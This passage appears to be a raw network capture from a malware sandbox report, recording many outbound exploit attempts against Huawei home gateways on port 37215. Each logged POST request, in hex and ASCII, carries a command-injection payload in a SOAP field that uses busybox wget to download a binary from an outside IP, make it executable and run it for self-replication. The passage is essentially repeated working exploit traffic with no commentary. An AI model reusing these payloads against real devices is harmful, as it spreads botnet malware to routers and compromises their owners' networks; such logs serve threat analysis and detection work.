69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  376192.168.2.1356196180.65.55.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100723982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  377192.168.2.133519293.250.247.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100742102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  378192.168.2.135513841.103.101.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100742102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  379192.168.2.134078841.180.38.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100769997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  380192.168.2.1355906165.106.27.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100770950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  381192.168.2.1342350197.221.89.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100795031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  382192.168.2.135598041.30.134.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100804090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  383192.168.2.134589441.215.68.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100809097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  384192.168.2.1335076197.6.142.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100832939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  385192.168.2.1351548197.119.136.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100836992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  386192.168.2.13509902.232.122.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100848913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
